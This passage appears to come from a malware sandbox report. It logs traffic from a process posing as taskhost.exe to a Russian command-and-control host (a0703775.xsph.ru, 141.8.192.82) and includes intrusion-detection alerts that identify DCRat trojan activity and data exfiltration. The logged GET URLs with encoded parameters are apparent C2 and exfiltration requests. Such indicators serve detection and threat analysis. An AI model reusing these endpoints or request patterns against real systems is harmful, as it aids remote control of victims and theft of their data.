MxEzYkZDN3ADZlVTZis3W | RU | — | — | malicious |
2456 | taskhost.exe | GET | — | 141.8.192.82:80 | http://a0703775.xsph.ru/_Defaultwindows.php?J0b7w1U=kjeOu11QiD6TJENsq78v8bq&c82e276f9453e631934d7a9a9fb6e8fd=QZzQDMmBjZwMDZhNDMjFGN0UmN4QzMhRmMxMjN5QTZyAzYhljNxUDZ5EDMykzMwgDOzgzM2ADN&52e56fa0fd9909e706f64115c778c92e=gMwMWZ0kDMmJWNiRTO4U2N2MDMwAjYyEzYkNGNhZjZxgDOiJDOyAjY&17f66129747d8bcfad4426ccdcc9bf80=QX9JSUNJiOiEWZ5YGN2UGNzETOzUTY0ImZ0EmZ0gzMkdjYmBzN2czMiwiI5UjMwQ2M5EjNlZTYhlTYkNTYiZmZlhjY1czYiFTO2ETOhVWZiJjM4IiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W | RU | — | — | malicious |
2456 | taskhost.exe | GET | — | 141.8.192.82:80 | http://a0703775.xsph.ru/_Defaultwindows.php?J0b7w1U=kjeOu11QiD6TJENsq78v8bq&c82e276f9453e631934d7a9a9fb6e8fd=QZzQDMmBjZwMDZhNDMjFGN0UmN4QzMhRmMxMjN5QTZyAzYhljNxUDZ5EDMykzMwgDOzgzM2ADN&52e56fa0fd9909e706f64115c778c92e=gMwMWZ0kDMmJWNiRTO4U2N2MDMwAjYyEzYkNGNhZjZxgDOiJDOyAjY&17f66129747d8bcfad4426ccdcc9bf80=QX9JSUNJiOiEWZ5YGN2UGNzETOzUTY0ImZ0EmZ0gzMkdjYmBzN2czMiwiI5UjMwQ2M5EjNlZTYhlTYkNTYiZmZlhjY1czYiFTO2ETOhVWZiJjM4IiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W | RU | — | — | malicious |
2456 | taskhost.exe | GET | — | 141.8.192.82:80 | http://a0703775.xsph.ru/_Defaultwindows.php?J0b7w1U=kjeOu11QiD6TJENsq78v8bq&c82e276f9453e631934d7a9a9fb6e8fd=QZzQDMmBjZwMDZhNDMjFGN0UmN4QzMhRmMxMjN5QTZyAzYhljNxUDZ5EDMykzMwgDOzgzM2ADN&52e56fa0fd9909e706f64115c778c92e=gMwMWZ0kDMmJWNiRTO4U2N2MDMwAjYyEzYkNGNhZjZxgDOiJDOyAjY&1062bb854f89fb8f9d4a26ad510d529a=d1nI1ITMiNDM4ITOkRDMklTYxIDN4MTZmBzMmNzYkdDZ3cjZkBTN0AzYzIiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W&17f66129747d8bcfad4426ccdcc9bf80=d1nIiojIhVWOmRjNlRzMxkzM1EGNiZGNhZGN4MDZ3ImZwcjN3MjIsISNyEjYzADOykDZ0ADZ5EWMyQDOzUmZwMjZzMGZ3Q2N3YGZwUDNwM2MiojIzcTN2gDM0QTNjJWO1ImM2IWYwMDZkRDZwMjZjNzY1gjIsISMmNGN0M2YihzYmRGZhVzYzQWOyEmMkFzYyQWZycDOzEWY1YWZkZGZiojIkZDZ1MWMjFTYzgTMkBTNzY2M2ETMxMGZ2QzNwQWZ1UmI7xSfiADWmlWTYJ2ZjRlTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpFlbjhmUzUVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5ENoNUS2gGMSd3YqxUeBNUUnVlRVRkQD10dRpmT0VFVhd2aTRVVoNlW5ljMRd2apV1b3dlWwUzVTl2bqlEbxcVWPZlRVRkSDxUarNVU2RTRLdWSYpFMChVWrZURJpnTXF2bChVW5RWRJJEZrZ1ZR12YoJVbihmUzUVavpWSsFzVZ9kVGVFSKNETpRzaJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnlkeNd2dXlVd5cVY65EWa1WOtNWUClnTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJBHdtJGcOhkYshGMMxmQzIWeWhlUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSDpVdGdkY1xWbSdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplkaNBzaqxEMJRET0sGVNVXQq5UavpWSqlzRil2dplkSatWS2k0UllnUuJWM5ITWpdXaJhmRXJGcOhFZWpUaPlGNyIGckdlW5p0QMl2ayEWdsJzYzZ1RTl2bqlUNShVYqp0QMlWWqxUerRVT1FFROlHNp5UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEWZ5YGN2UGNzETOzUTY0ImZ0EmZ0gzMkdjYmBzN2czMiwiIxYDZkR2NlZTY4UmNjFjN1IGZwE2MxYGM1cjMlJWM5MjNkVWYhlTYmJiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W | RU | — | — | malicious |
2456 | taskhost.exe | GET | — | 141.8.192.82:80 | http://a0703775.xsph.ru/_Defaultwindows.php?J0b7w1U=kjeOu11QiD6TJENsq78v8bq&c82e276f9453e631934d7a9a9fb6e8fd=QZzQDMmBjZwMDZhNDMjFGN0UmN4QzMhRmMxMjN5QTZyAzYhljNxUDZ5EDMykzMwgDOzgzM2ADN&52e56fa0fd9909e706f64115c778c92e=gMwMWZ0kDMmJWNiRTO4U2N2MDMwAjYyEzYkNGNhZjZxgDOiJDOyAjY&1062bb854f89fb8f9d4a26ad510d529a=d1nI1ITMiNDM4ITOkRDMklTYxIDN4MTZmBzMmNzYkdDZ3cjZkBTN0AzYzIiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W&17f66129747d8bcfad4426ccdcc9bf80=d1nIiojIhVWOmRjNlRzMxkzM1EGNiZGNhZGN4MDZ3ImZwcjN3MjIsISNyEjYzADOykDZ0ADZ5EWMyQDOzUmZwMjZzMGZ3Q2N3YGZwUDNwM2MiojIzcTN2gDM0QTNjJWO1ImM2IWYwMDZkRDZwMjZjNzY1gjIsISMmNGN0M2YihzYmRGZhVzYzQWOyEmMkFzYyQWZycDOzEWY1YWZkZGZiojIkZDZ1MWMjFTYzgTMkBTNzY2M2ETMxMGZ2QzNwQWZ1UmI7xSfiADWmlWTYJ2ZjRlTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpFlbjhmUzUVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5ENoNUS2gGMSd3YqxUeBNUUnVlRVRkQD10dRpmT0VFVhd2aTRVVoNlW5ljMRd2apV1b3dlWwUzVTl2bqlEbxcVWPZlRVRkSDxUarNVU2RTRLdWSYpFMChVWrZURJpnTXF2bChVW5RWRJJEZrZ1ZR12YoJVbihmUzUVavpWSsFzVZ9kVGVFSKNETpRzaJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnlkeNd2dXlVd5cVY65EWa1WOtNWUClnTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJBHdtJGcOhkYshGMMxmQzIWeWhlUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXSDpVdGdkY1xWbSdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplkaNBzaqxEMJRET0sGVNVXQq5UavpWSqlzRil2dplkSatWS2k0UllnUuJWM5ITWpdXaJhmRXJGcOhFZWpUaPlGNyIGckdlW5p0QMl2ayEWdsJzYzZ1RTl2bqlUNShVYqp0QMlWWqxUerRVT1FFROlHNp5UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEWZ5YGN2UGNzETOzUTY0ImZ0EmZ0gzMkdjYmBzN2czMiwiIxYDZkR2NlZTY4UmNjFjN1IGZwE2MxYGM1cjMlJWM5MjNkVWYhlTYmJiOiMzN1YDOwQDN1MmY5UjYyYjYhBzMkRGNkBzMmN2MjVDOiwiIxY2Y0QzYjJGOjZGZkFWNjNDZ5ITYyQWMjJDZlJzN4MTYhVjZlRmZkJiOiQmNkVzYxMWMhNDOxQGM1MjZzYTMxEzYkZDN3ADZlVTZis3W | RU | — | — | malicious |
2456 | taskhost.exe | GET | 200 | 141.8.192.82:80 | http://a0703775.xsph.ru/_Defaultwindows.php?J0b7w1U=kjeOu11QiD6TJENsq78v8bq&c82e276f9453e631934d7a9a9fb6e8fd=QZzQDMmBjZwMDZhNDMjFGN0UmN4QzMhRmMxMjN5QTZyAzYhljNxUDZ5EDMykzMwgDOzgzM2ADN&52e56fa0fd9909e706f64115c778c92e=gMwMWZ0kDMmJWNiRTO4U2N2MDMwAjYyEzYkNGNhZjZxgDOiJDOyAjY&f4b5f62e2961b8bc6ec1db0eb7bcef7d=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 | RU | text | 2.07 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2456 | taskhost.exe | 141.8.192.82:80 | a0703775.xsph.ru | Sprinthost.ru LLC | RU | malicious |
— | — | 141.8.192.82:80 | a0703775.xsph.ru | Sprinthost.ru LLC | RU | malicious |
Domain | IP | Reputation |
---|---|---|
a0703775.xsph.ru |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2456 | taskhost.exe | A Network Trojan was detected | ET TROJAN DCRAT Activity (GET) |
2456 | taskhost.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
2456 | taskhost.exe | A Network Trojan was detected | ET TROJAN Win32/DCRat CnC Exfil |
2456 | taskhost.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |
2456 | taskhost.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
2456 | taskhost.exe | A Network Trojan was detected | ET TROJAN Win32/DCRat CnC Exfil |
2456 | taskhost.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |
2456 | taskhost.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
2456 | taskhost.exe | A Network Trojan was detected | ET TROJAN Win32/DCRat CnC Exfil |
2456 | taskhost.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |